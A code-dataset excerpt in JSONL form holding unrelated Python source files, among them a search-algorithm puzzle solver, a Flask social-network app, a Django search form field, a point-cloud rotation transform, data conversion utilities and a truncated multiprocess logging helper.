6:\n cost += 5\n else:\n print(difference)\n raise ValueError\n copy[index_first_w], copy[index_first_b] = copy[index_first_b], copy[index_first_w]\n return cost\n\ndef graphsearch(problem_state, procedure_name, flag):\n \"\"\" Graphserach implementation of A & DLS \"\"\"\n root = Node(None)\n root.state = list(problem_state)\n if procedure_name == \"DLS\": # set up for DLS\n root.depth = 0\n else: # set up for A/A*\n root.estimate_Gn = 0\n root.set_heuristic_value(heuristic_function(root.state))\n root.total_cost = 0\n open = {} # open set\n add_to_dict(root, procedure_name, open) # add element to open\n closed = {} # closed set\n while(True):\n if len(open) <= 0: # no more operations\n return False\n node = get_node_to_expand(open, procedure_name) # find best node to expand based on id for DLS, f(n) for A\n # if node.get_id_rep() == \"N64\":\n # print_structure(root)\n # else:\n # print(node.get_id_rep())\n add_to_dict(node, procedure_name, closed) # add node to closed\n if check_goal_state(node.state): # check goal state\n return node # return node with goal state\n if procedure_name == \"DLS\": # check depth limit in DLS\n if node.depth >= 70:\n return False\n operations = get_operations(node.state) # get all possible operations from this state\n # generate children that are not ancestors of current path (so no cycle)\n # also checks if it has been seen before and does pointer redirection if needed\n if flag >= 1:\n if procedure_name == \"A\":\n print(\"Node Expanded\\nid: \" + str(node.get_id_rep()) + \", operation expansion order: \" + str(operations) + \", g(n) = \" + str(node.estimate_Gn)\n + \", h(n) = \" + str(node.heuristic_value) + \", f(n) = \" + str(node.estimate_Fn) + \"\\nOpen: \" + str(dictionary_to_list(open))\n + \"\\nClosed: \" + str(dictionary_to_list(closed)))\n\n write_diagnostic_info(\"Node Expanded\\nid: \" + str(node.get_id_rep()) + \", operation expansion order: \" + str(operations) + \", g(n) = \" + str(node.estimate_Gn)\n + \", h(n) = \" + str(node.heuristic_value) + \", f(n) = \" + str(node.estimate_Fn) + \"\\nOpen: \" + str(dictionary_to_list(open))\n + \"\\nClosed: \" + str(dictionary_to_list(closed)))\n else:\n print(\"Node Expanded\\nid: \" + str(node.get_id_rep()) + \", operation expansion order: \" + str(operations) + \", cost of reaching node - g(n): \" + str(node.total_cost)\n + \"\\nOpen: \" + str(dictionary_to_list(open)) + \"\\nClosed: \" + str(dictionary_to_list(closed)))\n\n write_diagnostic_info(\"Node Expanded\\nid: \" + str(node.get_id_rep()) + \", operation expansion order: \" + str(operations) + \", cost of reaching node - g(n): \" + str(node.total_cost)\n + \"\\nOpen: \" + str(dictionary_to_list(open)) + \"\\nClosed: \" + str(dictionary_to_list(closed)))\n children = generate_children(node, operations, open, closed, procedure_name, flag)\n for child in children:\n point_parent_to_child(node, child) # make node point to it's child\n add_to_dict(child, procedure_name, open) # add child to open set\n\n flag -= 1\n# ----------------------------------------------- I/O functions ------------------------------------------------- #\n\ndef solve_puzzle(problem_state, procedure_name, output_file_name, flag):\n global makef\n makef = True\n if procedure_name == \"BK\":\n node = Node(None)\n node.state_list = [list(problem_state)]\n node.operation_list = []\n node.total_cost = 0\n result = backtrack(node, flag)\n elif procedure_name == \"DLS\":\n result = graphsearch(problem_state, \"DLS\", flag)\n elif procedure_name == \"A\":\n result = graphsearch(problem_state, \"A\", flag)\n else:\n print(\"Invalid input\")\n path = find_solution(result, procedure_name)\n write_solution(output_file_name, path)\n\ndef write_solution(output_file_name, path):\n global makef\n if makef:\n f = open(output_file_name, \"w\")\n makef = False\n else:\n f = open(output_file_name, \"a\")\n for segment in path:\n f.write(str(segment[0]) + \"\\t\" + str(\"\".join(segment[1])) + \"\\t\" + str(segment[2]) + \"\\n\")\n f.close()\n\ndef write_diagnostic_info(info):\n global makef\n if makef:\n f = open(output_file_name, \"w\")\n makef = False\n else:\n f = open(output_file_name, \"a\")\n f.write(info+\"\\n\")\n f.close()\n\nif __name__ == \"__main__\":\n # puzzle-string procedure-name outputfile-name Flag\n global output_file_name\n\n import sys\n puzzle_string = sys.argv[1]\n procedure_name = sys.argv[2]\n output_file_name = sys.argv[3]\n flag = int(sys.argv[4])\n #puzzle_string = 'BBBWWWE'\n #procedure_name = \"DLS\"\n #output_file_name = \"testcase_BBBWWWE_DLS\"\n #flag = 0\n\n output_file_name = output_file_name+\".txt\"\n solve_puzzle(puzzle_string, procedure_name, output_file_name, flag)\n\n \"\"\" To run from terminal/cmd line\n Davids-MacBook-Pro-2:Assignment1_Submission David$ python3 solvepuzzle.py BBBWWWE DLS DLS_out 0\n Davids-MacBook-Pro-2:Assignment1_Submission David$ python3 solvepuzzle.py BBBWWWE A A_out 0\n Davids-MacBook-Pro-2:Assignment1_Submission David$ python3 solvepuzzle.py BBBWWWE BK BK_out 0\n \"\"\"\n \"\"\"\n def test_heuristic_function():\n states = [(\"BWWWWBEB\",\"S\"), (\"BWWWWEBB\",\"1L\"), (\"BWWEWWBB\", \"2L\"),(\"EWWBWWBB\", \"3L\"), (\"WWEBWWBB\",\"2R\"),(\"WWWBWEBB\",\"3R\"),(\"WWWEWBBB\",\"2L\")]\n for i in range(1,len(states)-1):\n hn = heuristic_function(list(states[i-1][0]))\n hm = heuristic_function(list(states[i][0]))\n cnm = get_operation_cost(states[i][1])\n print(\"h(n) = \" + str(hn))\n print(\"h(m) = \" + str(hm))\n print(\"c(n,m) = \" + str(cnm))\n print(\" h(n) <= c(n,m) + h(m) | \" + str(hn) + \" <= \" + str(cnm+hm))\n test_heuristic_function()\n \"\"\"\n \"\"\"\n start BWWWWBEB 0\n 1L BWWWWEBB 1\n 2L BWWEWWBB 2\n 3L EWWBWWBB 4\n 2R WWEBWWBB 5\n 3R WWWBWEBB 7\n 2L WWWEWBBB 8\n \"\"\"","sub_path":"FIT3080-Intelligent-Systems/A1-Searches-Backtracking-DLS-A*/solvepuzzle.py","file_name":"solvepuzzle.py","file_ext":"py","file_size_in_byte":36145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"235496367","text":"import Parse_Revised\n\nParse_Revised.readParserDefinitions(\"sampleRules.dat\")\n\nglobal sentences\nsentences = []\n\nParse_Revised.debug_print = False\n\ndef gather(sentence_string):\n global sentences\n sentences.append(sentence_string.rstrip().split(\" \"))\n \nhandle = open(\"sentences.txt\", 'r')\nfor sentence in handle:\n gather(sentence)\nhandle.close()\n\nfor sentence in sentences:\n print\n Parse_Revised.parse(sentence)","sub_path":"Parser/runParse_revised.py","file_name":"runParse_revised.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"496550462","text":"import numpy as np\nfrom randomwalkincome import randomwalkincome\n\n# Model Parameters\nN = 20\t\t# number of grid points of assets\nI = 10\t\t# number of grid points of permanent income\nT = 45\t\t# number of periods total\nR = 15\t\t# number of periods in retirement\n\n# Income\ninc_work = 15000*np.ones((1, T-R))\ninc_ret = 5000*np.ones((1,R))\ninc = np.hstack((inc_work, inc_ret))\n\n# Labor Supply\nwork = np.hstack((np.ones((1, T-R)), np.zeros((1, R))))\n\n# Random Income Component\nsigma = 0.5\nTransP, RI = randomwalkincome(I, sigma)\nRandInc = np.exp(RI)\n# Income variables\n\ninc_unc = np.ones((I, T))\nfor i in xrange(I):\n\tprint\n\tfor t in xrange(T):\n\t\tinc_unc[i,t] = max(0, inc[0,t]*RandInc[i])\n\n# Other Parameters\nbeta = 0.98\nr = 0.03\ngamma = 1.5\npsi = 0.003\n\n# Wealth Grid\nWealthGrid = np.linspace(-200000, 2000000, N).reshape((N, 1))\n\n#Find where grid is 0\na0 = abs(WealthGrid).argmin()","sub_path":"simple/python/parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"381145634","text":"import math\n\ndef polysum(n,s):\n sum = 0\n\n area = (0.25*n*(s**2))/(math.tan(math.pi/n))\n lengthSquared = (n * s)**2 \n\n sum = area + lengthSquared\n return round(sum,4)","sub_path":"Python/Eksempler/regularPolynom.py","file_name":"regularPolynom.py","file_ext":"py","file_size_in_byte":180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"312560870","text":"'''\nConverts a BED format file to a gff3-like file for input into scripts that require it.\n'''\nfrom optparse import OptionParser\nimport sys\nimport re\n\ndef parse_options():\n\tparser = OptionParser()\n\tparser.add_option(\"-f\", \"--bed_file\", dest=\"bed_file\",\n\t\t\t\t\t help=\"BED file\", metavar=\"BEDFILE\")\n\t(options, args) = parser.parse_args()\n\treturn options\n\noptions = parse_options()\ninfile = open(options.bed_file, 'r')\noutfile = open(re.sub('bed','gff3', options.bed_file),'w')\n\nfor line in infile:\n\tline = line.rstrip()\n\titems = line.split()\n\toutfile.write(items[0] + '\\t.\\t' + items[3] + '\\t' + items[1] + '\\t' + items[2] + '\\t' + items[4] + '\\t.\\t.\\t.\\n')\n\ninfile.close()\noutfile.close()","sub_path":"BED_to_gff_v1.py","file_name":"BED_to_gff_v1.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"483739380","text":"\n\n#calss header\nclass _PEDOMETER():\n\tdef __init__(self,): \n\t\tself.name = \"PEDOMETER\"\n\t\tself.definitions = [u'a device that measures how far someone has walked by counting the number of times the feet are raised and put down again']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_pedometer.py","file_name":"_pedometer.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"182288568","text":"\n\n# *********************************************************************\ndef Convert_Str_to_Bytearray(text_in):\n '''\n :param text_in:\n :param bytearray_out:\n :return:\n '''\n if isinstance(text_in, str):\n bytearray_out = bytearray(b'')\n for data in text_in:\n bytearray_out += ord(data).to_bytes(1, 'big')\n return bytearray_out\n else:\n return None\n\n# *********************************************************************\ndef Convert_HexStr_to_Bytearray(text_in):\n '''\n :param text_in:\n :param bytearray_out:\n :return:\n '''\n if isinstance(text_in, str):\n bytearray_out = bytearray(b'')\n i = 0\n strLength = len(text_in)\n while i < strLength:\n convStr = text_in[i:i+2]\n bytearray_out += int(convStr, 16).to_bytes(1, 'big')\n i+=2\n return bytearray_out\n else:\n return None\n\n# *********************************************************************\ndef Convert_HexStr_to_Str(text_in, start, end):\n '''\n :param text_in:\n :param str_out:\n :return:\n '''\n if isinstance(text_in, str):\n str_out = ''\n i = start\n strLength = len(text_in[:end])\n while i < strLength:\n convStr = text_in[i:i+2]\n str_out += chr(int(convStr, 16))\n i+=2\n return str_out\n else:\n return None\n\ndef Convert_ArrBite_to_ArrChar(data):\n '''\n #*********************************************************************\n # извлечение номера в формате str из данных в формате byte\n # [data] - данные в формате byte\n #*********************************************************************\n '''\n text = ''\n lenData = len(data)\n for i in range(lenData):\n text += chr(data[i])\n return text\n\ndef Convert_ArrBite_to_ArrCharHex(data):\n '''\n #*********************************************************************\n # конвертация символов bite в последовательность символов Hex\n # [data] - данные в формате byte\n #*********************************************************************\n '''\n text = ''\n lenData = len(data)\n try:\n for i in range(lenData):\n if int(data[i]) > 0x0f:\n text += hex(data[i])[2:]\n else:\n text += '0' + hex(data[i])[2:]\n except:\n return ''\n return text\n\n#*********************************************************************\ndef Del_Spaces(data):\n '''\n удаление пробелов в строковом списке\n :param data: строковый список для обработки\n :return: data_out - искходый список но без пробелов\n '''\n data_out = []\n for row in data:\n row_out = []\n for pos in row:\n if isinstance(pos, str) and pos != '':\n while pos[-1] == ' ':\n pos = pos[:-1]\n if len(pos) == 0:\n break\n row_out.append(pos)\n data_out.append(row_out)\n return data_out\n\n#*********************************************************************\ndef Byte_to_Bytearray(RX_Data):\n '''\n #перевод данных из byte в bytearray\n :param RX_Data:\n :return:\n '''\n #переводим принятые данные в bytearray для удобства дальнейшей работы с ними\n RX_Data_return = bytearray(len(RX_Data))\n for i in range(len(RX_Data)):\n RX_Data_return[i] = RX_Data[i]\n return RX_Data_return\n\ndef toSigned16(n):\n n = n & 0xffff\n return (n ^ 0x8000) - 0x8000\n\ndef toSigned32(n):\n n = n & 0xffffffff\n return (n ^ 0x80000000) - 0x80000000","sub_path":"BIN_ASCII.py","file_name":"BIN_ASCII.py","file_ext":"py","file_size_in_byte":3861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"529513224","text":"\nclass Proventos:\n def __init__(self, dbCon):\n self._cod_cvm = None\n self._tipo_ativo = None\n self._data_aprovacao = None\n self._valor = None\n self._prov_por_unidade = None\n self._tipo = None\n self._dbCon = dbCon\n\n def SelecionarProvento(self, proventos):\n select_proventos = (\"SELECT * FROM PROVENTOS WHERE cod_cvm = %s and tipo_ativo = %s and data_aprovacao = %s\")\n select_data = (proventos._cod_cvm, proventos._tipo_ativo, proventos._data_aprovacao)\n\n result = self._dbCon.ExecuteSqlSelect(select_proventos, select_data)\n\n if (result is not None):\n provento = Proventos(self._dbCon)\n provento._cod_cvm = result[0][0]\n provento._tipo_ativo = result[0][1]\n provento._data_aprovacao = result[0][2]\n provento._valor = result[0][3]\n provento._prov_por_unidade = result[0][4]\n provento._tipo = result[0][5]\n return provento\n else:\n None\n\n def InserirProvento(self, provento):\n proventosAux = self.SelecionarProvento(provento)\n\n provento._valor = str(provento._valor).replace(',','.')\n\n if(proventosAux is None):\n add_provento = (\"INSERT INTO PROVENTOS \"\n \"(cod_cvm, tipo_ativo, data_aprovacao, valor, unidade, tipo)\"\n \"VALUES (%s, %s, %s, %s, %s, %s)\")\n data_dataProvento = (provento._cod_cvm, provento._tipo_ativo, provento._data_aprovacao, provento._valor, provento._prov_por_unidade, provento._tipo)\n\n if(self._dbCon.ExecuteSqlInsertUpd(add_provento, (data_dataProvento)) == True):\n return provento\n else:\n return None\n\n","sub_path":"Entidades/Proventos.py","file_name":"Proventos.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"592128729","text":"import json\n\nfrom elasticsearch_dsl import Q\nfrom pyquery import PyQuery as pq\nfrom django.db import models\n\nfrom solotodo.fields.custom_decimal_field import CustomDecimalField\nfrom solotodo.models.search_form_field import SearchFormField\n\n\nclass SearchFormDecimalSliderField(SearchFormField):\n name_lower = models.CharField(max_length=100)\n name_upper = models.CharField(max_length=100)\n title_label_pattern_lower = models.CharField(\n max_length=255, null=True, blank=True)\n title_label_pattern_upper = models.CharField(\n max_length=255, null=True, blank=True)\n remove_filter_label_pattern_lower = models.CharField(\n max_length=255, null=True, blank=True)\n remove_filter_label_pattern_upper = models.CharField(\n max_length=255, null=True, blank=True)\n filtering_pattern_lower = models.CharField(\n max_length=255, null=True, blank=True)\n filtering_pattern_upper = models.CharField(\n max_length=255, null=True, blank=True)\n min_value = models.IntegerField()\n max_value = models.IntegerField()\n step = models.IntegerField()\n\n def __unicode__(self):\n return u'{0} - {1}'.format(self.fieldset, self.label)\n\n def get_base_fields(self):\n return {\n self.name_lower: self.get_widget_lower(),\n self.name_upper: self.get_widget_upper()\n }\n\n def get_widget_lower(self):\n return CustomDecimalField(\n max_value=self.max_value,\n min_value=self.min_value,\n initial=self.min_value,\n required=False,\n title_label_pattern=self.title_label_pattern_lower,\n remove_filter_label_pattern=self.remove_filter_label_pattern_lower\n )\n\n def get_widget_upper(self):\n return CustomDecimalField(\n max_value=self.max_value,\n min_value=self.min_value,\n initial=self.max_value,\n required=False,\n title_label_pattern=self.title_label_pattern_upper,\n remove_filter_label_pattern=self.remove_filter_label_pattern_upper\n )\n\n def _render_lower(self, form, extra_no_ui_slider_ranges):\n widget_container = pq('
')\n\n widget_node = pq(form[self.name_lower].as_widget(\n attrs={'min': self.min_value,\n 'max': self.max_value,\n # 'step': self.step,\n 'extra_ranges': json.dumps(extra_no_ui_slider_ranges)}))\n widget_node.add_class('form-control')\n\n widget_container.append(widget_node)\n\n return widget_container\n\n def _render_upper(self, form, extra_no_ui_slider_ranges):\n widget_container = pq('
')\n\n widget_node = pq(form[self.name_upper].as_widget(\n attrs={'min': self.min_value,\n 'max': self.max_value,\n # 'step': self.step,\n 'extra_ranges': json.dumps(extra_no_ui_slider_ranges)}))\n widget_node.add_class('form-control')\n\n widget_container.append(widget_node)\n\n return widget_container\n\n def extra_backend_args(self, form):\n if self.name_lower == 'min_price' and self.name_upper == 'max_price':\n adjusted_max_price = form.cleaned_data['max_price']\n\n if adjusted_max_price == self.max_value:\n adjusted_max_price = None\n\n return {\n 'min_price': form.cleaned_data['min_price'],\n 'max_price': adjusted_max_price\n }\n\n return {}\n\n def render(self, form, extra_no_ui_slider_ranges={}):\n field_node = pq('
')\n field_node.append(self._render_lower(form, extra_no_ui_slider_ranges))\n field_node.append(self._render_upper(form, extra_no_ui_slider_ranges))\n\n container = pq(\"\"\"\n
\n
\n
\n {}\n   -\n  \n
\n
\n {}\n
\n
\n
\n
\n
\n
\"\"\".format(str(self.step), self.label.replace('\\z', ''),\n field_node))\n\n return container\n\n def is_slider(self):\n return True\n\n def active_filters(self, form_cleaned_data, include_redundant_sliders):\n result = {}\n\n initial_values = [self.min_value, self.max_value]\n\n for idx, handle in enumerate(['lower', 'upper']):\n field_name = getattr(self, 'name_' + handle)\n\n value = form_cleaned_data[field_name]\n\n if value == initial_values[idx] and not include_redundant_sliders:\n continue\n\n filtering_pattern = getattr(self, 'filtering_pattern_' + handle)\n\n if value is not None:\n es_field, lookup_type = filtering_pattern.split('__')\n\n kwargs = {\n es_field: {\n lookup_type: value\n }\n }\n\n result[field_name] = Q('range', **kwargs)\n\n return result\n\n class Meta:\n app_label = 'solotodo'\n ordering = ('fieldset', 'ordering', )\n","sub_path":"solotodo/models/search_form_decimal_slider_field.py","file_name":"search_form_decimal_slider_field.py","file_ext":"py","file_size_in_byte":5559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"133356776","text":"# -*- coding:utf-8 -*-\nimport random\n\nfrom flask import Flask, request, render_template, redirect, url_for, session, jsonify\nfrom models.executeSqlite3 import executeSelectOne, executeSelectAll, executeSQL\nfrom functools import wraps\nfrom models.user_manager import UserManager\nfrom models.user_type_manager import UserTypeManager\nfrom models.base_manager import SNBaseManager\nfrom flask_mail import Mail, Message\nimport os\n\n# створюємо головний об'єкт сайту класу Flask\nfrom models.post_manager import PostManager\n\napp = Flask(__name__)\n# добавляємо секретний ключ для сайту щоб шифрувати дані сессії\n# при кожнаму сапуску фласку буде генечитись новий рандомний ключ з 24 символів\n# app.secret_key = os.urandom(24)\napp.secret_key = '121212121212'\n\ndef login_required(f):\n @wraps(f)\n def wrap(*args, **kwargs):\n if 'username' in session:\n if UserManager.load_models.get(session['username'], None):\n return f(*args, **kwargs)\n return redirect(url_for('login'))\n return wrap\n# app.secret_key = '125'\napp.config['MAIL_SERVER'] = 'smtp.gmail.com'\napp.config['MAIL_PORT'] = 587\napp.config['MAIL_USE_TLS'] = True\n# app.config['MAIL_USE_SSL'] = True\napp.config['MAIL_USERNAME'] = 'vovatrap@gmail.com'\napp.config['MAIL_PASSWORD'] = ''\nmail = Mail(app)\n\n@app.route('/email')\ndef email():\n # mail.connect()\n msg = Message('hello',sender='vovatrap@gmail.com', recipients=['vovatrap@gmail.com'])\n # msg.send(mail)\n app.logger.debug('msg = {}'.format(msg))\n app.logger.info('hello')\n app.logger.error('hello')\n app.logger.warning('hello')\n return 'ok'\n\n# описуємо логін роут\n# вказуємо що доступні методи \"GET\" і \"POST\"\n@app.route('/login', methods=[\"GET\", \"POST\"])\ndef login():\n if request.method == 'POST':\n # якщо метод пост дістаємо дані з форми і звіряємо чи є такий користвач в базі данних\n # якшо є то в дану сесію добавляєм ключ username\n # і перекидаємо користувача на домашню сторінку\n user = UserManager()\n if user.loginUser(request.form):\n addToSession(user)\n return redirect(url_for('home'))\n\n return render_template('login.html')\n\n\n\n# описуємо роут для вилогінення\n# сіда зможуть попадати тільки GET запроси\n@app.route('/logout')\n@login_required\ndef logout():\n user = session.get('username', None)\n if user:\n # якщо в сесії є username тоді видаляємо його\n del session['username']\n return redirect(url_for('login'))\n\n@app.route('/add_friend', methods=['GET'])\n@login_required\ndef add_friend():\n user_id = int(request.args.get('id',0))\n user = UserManager.load_models[session['username']]\n user.add_friend(id=user_id)\n return redirect(request.referrer)\n\n@app.route('/',methods=['GET'])\n@login_required\ndef user_page(nickname):\n context = {}\n if session.get('username', None):\n user = UserManager.load_models[session['username']]\n context['loginUser'] = user\n\n selectUser = UserManager()\n selectUser.select().And([('nickname','=',nickname)]).run()\n context['user'] = selectUser\n\n return render_template('home.html', context=context)\n\n# описуємо домашній роут\n# сіда зможуть попадати тільки GET запроси\n@app.route('/')\n@login_required\ndef home():\n context = {}\n if session.get('username', None):\n user = UserManager.load_models[session['username']]\n # якщо в сесії є username тоді дістаємо його дані\n # добавляємо їх в словник для передачі в html форму\n context['user'] = user\n context['loginUser'] = user\n return render_template('home.html', context=context)\n\n\ndef addToSession(user):\n session['username'] = user.object.nickname\n\n\n@app.route('/registration', methods=[\"GET\", \"POST\"])\ndef registr():\n context = {'Error': []}\n user_type = UserTypeManager()\n user_type.getTypeUser()\n if session.get('username', None):\n user = UserManager.load_models[session['username']]\n user_type.getTypeGroup()\n context['user'] = user\n context['type'] = user_type\n\n if request.method == 'POST':\n user = UserManager().getModelFromForm(request.form)\n if user.check_user():\n context['Error'].append('wrong name or email')\n if user.object.type.type_name == 'user':\n if not user.object.password:\n context['Error'].append('incorrect password')\n if context['Error']:\n return render_template('registration.html', context=context)\n if user.save():\n UserManager.load_models[user.object.nickname] = user\n addToSession(user)\n return redirect(url_for('home'))\n context['Error'].append('incorrect data')\n return render_template('registration.html', context=context)\n\n@app.route('/add_post', methods=['GET','POST'])\n@login_required\ndef add_post():\n if request.method == 'POST':\n post = PostManager()\n print(list(request.form.keys()))\n user = UserManager.load_models[session['username']]\n post.save_post(request.form, user)\n return render_template('add_post.html')\n\n@app.route('/add_like', methods=['POST'])\n@login_required\ndef add_like():\n app.logger.debug('request.is_xhr = {}'.format(request.is_xhr))\n if request.is_xhr:\n # print(str(request.json['id']))\n user = UserManager.load_models[session['username']]\n app.logger.debug('user = {} like post with id = {}'.format(user.object.first_name, request.json['id']))\n ok =random.choice([True,False])\n print(ok)\n if ok:\n return jsonify({'status':'ok'})\n return jsonify({'status':'error','message':'something wrong'})\n\n\n@app.route('/like_example')\n@login_required\ndef like_example():\n return render_template('index.html')\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0',port=8000,debug=True)\n","sub_path":"goiteens/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"84801891","text":"import numpy as np\n\nclass CoordImage(object):\n \n def __init__(self, data=None, xgrid=None, ygrid=None):\n if xgrid!=None:self.xgrid=xgrid\n if ygrid!=None:self.ygrid=ygrid\n self.points=data\n \n \n \n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n \n file=r'test/pointCloud/01_initialization/input/01_OP2S06_CMMsurface.dat'\n data=np.genfromtxt(file)\n xgrid=np.arange(100.)\n ygrid=np.arange(-50.,50)\n a=CoordImage(data, xgrid, ygrid) #image with grid\n b=CoordImage(data) #image without grid","sub_path":"pySurf/CoordImage.py","file_name":"CoordImage.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"108765514","text":"import json\nimport random\n\nimport numpy as np\n\nfrom graph_ter_cls.transforms import utils\nfrom graph_ter_cls.transforms.transformer import Transformer\n\n\nclass GlobalRotate(Transformer):\n def __init__(self,\n num_samples=256,\n mode='isotropic', # isotropic or anisotropic\n transform_range=(-np.pi / 36.0, np.pi / 36.0)):\n super().__init__(out_features=3)\n self.num_samples = num_samples\n self.mode = mode\n self.low, self.high = utils.get_range(transform_range)\n\n @staticmethod\n def _build_rotation_matrix(parameters):\n theta_x = parameters[0]\n theta_y = parameters[1]\n theta_z = parameters[2]\n\n matrix_x = np.eye(3)\n matrix_x[1, 1] = np.cos(theta_x)\n matrix_x[1, 2] = -np.sin(theta_x)\n matrix_x[2, 1] = -matrix_x[1, 2]\n matrix_x[2, 2] = matrix_x[1, 1]\n\n matrix_y = np.eye(3)\n matrix_y[0, 0] = np.cos(theta_y)\n matrix_y[0, 2] = np.sin(theta_y)\n matrix_y[2, 0] = -matrix_y[0, 2]\n matrix_y[2, 2] = matrix_y[0, 0]\n\n matrix_z = np.eye(3)\n matrix_z[0, 0] = np.cos(theta_z)\n matrix_z[0, 1] = -np.sin(theta_z)\n matrix_z[1, 0] = -matrix_z[0, 1]\n matrix_z[1, 1] = matrix_z[0, 0]\n\n matrix = np.matmul(matrix_z, np.matmul(matrix_y, matrix_x))\n return matrix\n\n def __call__(self, x):\n num_points = x.shape[-1]\n if self.mode.startswith('aniso'):\n matrix = np.random.uniform(\n low=self.low, high=self.high, size=(3, self.num_samples)\n )\n else:\n matrix = np.random.uniform(\n low=self.low, high=self.high, size=(3, 1)\n )\n matrix = np.repeat(matrix, self.num_samples, axis=1)\n\n mask = np.sort(random.sample(range(num_points), self.num_samples))\n y = x.copy()\n if self.mode.startswith('aniso'):\n for index, transform_id in enumerate(mask):\n rotation_mat = self._build_rotation_matrix(matrix[:, index])\n y[:, transform_id] = np.dot(rotation_mat, y[:, transform_id])\n else:\n rotation_mat = self._build_rotation_matrix(matrix[:, 0])\n y[:, mask] = np.dot(rotation_mat, y[:, mask])\n mask = np.repeat(np.expand_dims(mask, axis=0), 3, axis=0)\n return y, matrix, mask\n\n def __repr__(self):\n info = self.get_config()\n info_json = json.dumps(info, sort_keys=False, indent=2)\n return info_json\n\n def get_config(self):\n result = {\n 'name': self.__class__.__name__,\n 'sampled points': self.num_samples,\n 'mode': self.mode,\n 'range': (self.low, self.high)\n }\n return result\n\n\ndef main():\n x = np.array([[1, 2, 3, 4, 5, 6, 7],\n [1, 2, 3, 4, 5, 6, 7],\n [1, 2, 3, 4, 5, 6, 7]], dtype=float)\n transform = GlobalRotate(num_samples=2, mode='isotropic')\n y, m, mask = transform(x)\n print(x)\n print(y)\n print(m)\n print(mask)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"graph_ter_cls/transforms/global_rotate.py","file_name":"global_rotate.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"19519989","text":"#!/usr/bin/env python\n\nimport sys\n\nacc = []\nperpl = []\n\n\nwith open(sys.argv[1]) as f:\n ln=0\n for line in f:\n line = line.strip()\n ln += 1\n if line.startswith('Validation perplexity:'):\n if len(acc) != len(perpl):\n raise Exception('Bad file format, unbalanced val. perpl. msg in line %d' % ln)\n\n perpl.append(line.split(':')[1].strip())\n if line.startswith('Validation accuracy:'):\n if len(acc) != len(perpl) - 1:\n raise Exception('Bad file format, unbalanced val. acc. msg in line %d' % ln)\n acc.append(line.split(':')[1].strip())\n\n\nepochs = len(acc)\nprint('\\t'.join([str(i+1) for i in range(epochs)]))\nprint('\\t'.join(acc))\nprint('\\t'.join(perpl))","sub_path":"scripts/print_epoch_acc.py","file_name":"print_epoch_acc.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"456827501","text":"#!/usr/bin/python3\r\n\"\"\" mplog.py: Support library for multi-process logging\r\n\"\"\"\r\n\r\n# Import Required Libraries (Standard, Third Party, Local) ************************************************************\r\nimport multiprocessing\r\nimport logging\r\nimport logging.handlers\r\nimport os\r\nimport sys\r\n\r\n\r\n# Authorship Info *****************************************************************************************************\r\n__author__ = \"Christopher Maue\"\r\n__copyright__ = \"Copyright 2016, The Maue-Home Project\"\r\n__credits__ = [\"Christopher Maue\"]\r\n__license__ = \"GPL\"\r\n__version__ = \"1.0.0\"\r\n__maintainer__ = \"Christopher Maue\"\r\n__email__ = \"csmaue@gmail.com\"\r\n__status__ = \"Development\"\r\n\r\n\r\n# Define Class for Log File / Path Creator ****************************************************************************\r\nclass LogFilePath(object):\r\n \"\"\" Creates log folder and logfile when called. This logfile will be used by the rest of the classes that\r\n make up this application.\r\n \"\"\"\r\n def __init__(self):\r\n self.name = \"undefined\"\r\n self.current_path = str()\r\n self.one_up_path = str()\r\n self.log_file_path = str()\r\n self.log_file_name = str()\r\n\r\n def define(self, **kwargs):\r\n if kwargs is not None:\r\n for key, value in kwargs.items():\r\n if key == \"name\":\r\n self.name = value\r\n # Get current path of script that is executing\r\n self.current_path = os.path.dirname(sys.argv[0])\r\n\r\n if os.path.isdir(os.path.join(self.current_path, 'logs')):\r\n self.log_file_path = os.path.join(self.current_path, 'logs')\r\n else:\r\n self.one_up_path = os.path.split(self.current_path)[0]\r\n if os.path.isdir(os.path.join(self.one_up_path, 'logs')):\r\n self.log_file_path = os.path.join(self.one_up_path, 'logs')\r\n else:\r\n self.log_file_path = self.current_path\r\n\r\n # Check to see if log folder exists in the proper location and create if it doesn't\r\n try:\r\n os.stat(self.log_file_path)\r\n except:\r\n os.mkdir(self.log_file_path)\r\n\r\n # Define log file\r\n self.log_file_name = self.name + '.log'\r\n\r\n return self.log_file_path, self.log_file_name\r\n#\r\n\r\n\r\n# Multiprocess Logger support functions *****************************************************************************\r\ndef listener_configurer(name):\r\n root = logging.getLogger()\r\n path, filename = LogFilePath().define(name=name)\r\n logfile = str(os.path.join(path, 